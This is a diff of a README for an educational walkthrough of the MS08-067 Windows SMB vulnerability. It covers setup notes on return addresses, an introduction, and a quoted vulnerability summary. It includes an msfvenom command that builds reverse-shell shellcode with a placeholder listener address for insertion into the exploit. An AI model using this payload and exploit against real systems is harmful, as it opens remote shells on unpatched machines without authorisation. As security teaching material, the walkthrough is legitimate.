cjjduck/ms08_067_walkthrough/README.md

 # Getting the exploit working

-This exploit is primarily written as a learning tool alongside the derivation guide below, it is intended as a documentation of my exploit development process as well as a brief literature review of the various components associated with the ms08_067 vulnerability, such as SMB, DCE/RPC, and named pipes.
-However, if you must break things with the code, ensure that you first have permission to test the target, and that you test the exploit in your own environment beforehand.
+This exploit is primarily written as a learning tool alongside the derivation guide below, it is intended as a documentation of my exploit development process, as well as a brief literature review of the various components associated with the ms08_067 vulnerability, such as SMB, DCE/RPC, and named pipes.
+However, if you must use the exploit code, ensure that you first have permission to test the target, and be sure to test the exploit in your own environment beforehand.

-The return addresses within the exploit should work perfectly for Windows XP SP 0 and 1 as is, any other targets will require a different return address and potentially some DEP and ASLR by-pass, see the source code of the ms08_067_netapi module in metasploit for more information.
+The shell code return addresses within the exploit should work perfectly for Windows XP SP 0 and 1 as is, any other targets will require a different return address, and potentially some DEP and ASLR by-pass.
+See the source code of the ms08_067_netapi module in metasploit for more information.

-Also, no matter the target, you will have to replace the payload with your own shellcode (to include source/target ip addresses etc), this can be done simply by running the msfvenom command:
+No matter the target, you will have to replace the payload with your own shellcode (to include source/target ip addresses etc), this can be done simply by running the msfvenom command:
 ```bash
 msfvenom --payload windows/shell_reverse_tcp --nopsled 7 LHOST=<your.ip.address.here> EXITFUNC=thread --bad-chars "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -e x86/jmp_call_additive
 ```
-and copying the output into the exploit code.
+and copying the output into the exploit code at the marked location.

-# Intro
+# Introduction

 The hacker ethos at its' core for me, just like any scientist, is an unbounded enthusiasm for understanding and communicating how things work.
-In lieu of this, I'll do my best to communicate what I've discovered, as well as how I discovered it, and indicate at each point where I've got my information from.
-I think that contributing the best way to feel legitimately involved in a community.
-So here it is, my first contribution, a walkthrough of the MS08_067 vulnerability, culminating with putting the exploit together myself in python.
+I believe that contributing is the best way to feel legitimately involved in a community.
+With that in mind, my first little contribution, a beginners' walkthrough of the MS08_067 vulnerability, culminating with the step-by-step development of a working exploit in Python.

 Let's start with the fact that MS08_067 is a bug, and it was given this rather bland codename because it was the 67th bugfix in 2008 by Microsoft.
-It was a particularly devastating bug, because prior to the update all a variety of Windows versions were exploitable at factory settings, without any credentials whatsoever, and completely automatable.
-So I recognise that at almost a decade old this is an ancient vulnerability, but during my time as a penetration tester in 2016/2017 I have discovered a fair number of machines *still* vulnerable to this.
+It was a particularly devastating bug, because prior to the update all a variety of Windows versions were exploitable at factory settings, without any credentials whatsoever, and it was completely automatable.
+I recognise that at almost a decade old, this is an ancient vulnerability, but during my time working as a penetration tester, even in 2016/2017, I have discovered a fair number of machines that are *still* vulnerable to this.

-So how does it work? let's start with the short explanation given with the bug on Rapid7 Vulndb:
+So, how does it work?
+Let's start with the short explanation given with the bug on Rapid7 Vulnerability database [0]:
 > This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service.
 This module is capable of bypassing NX on
 > some operating systems and service packs.
 The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from
 > crashing.
 Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts.
 This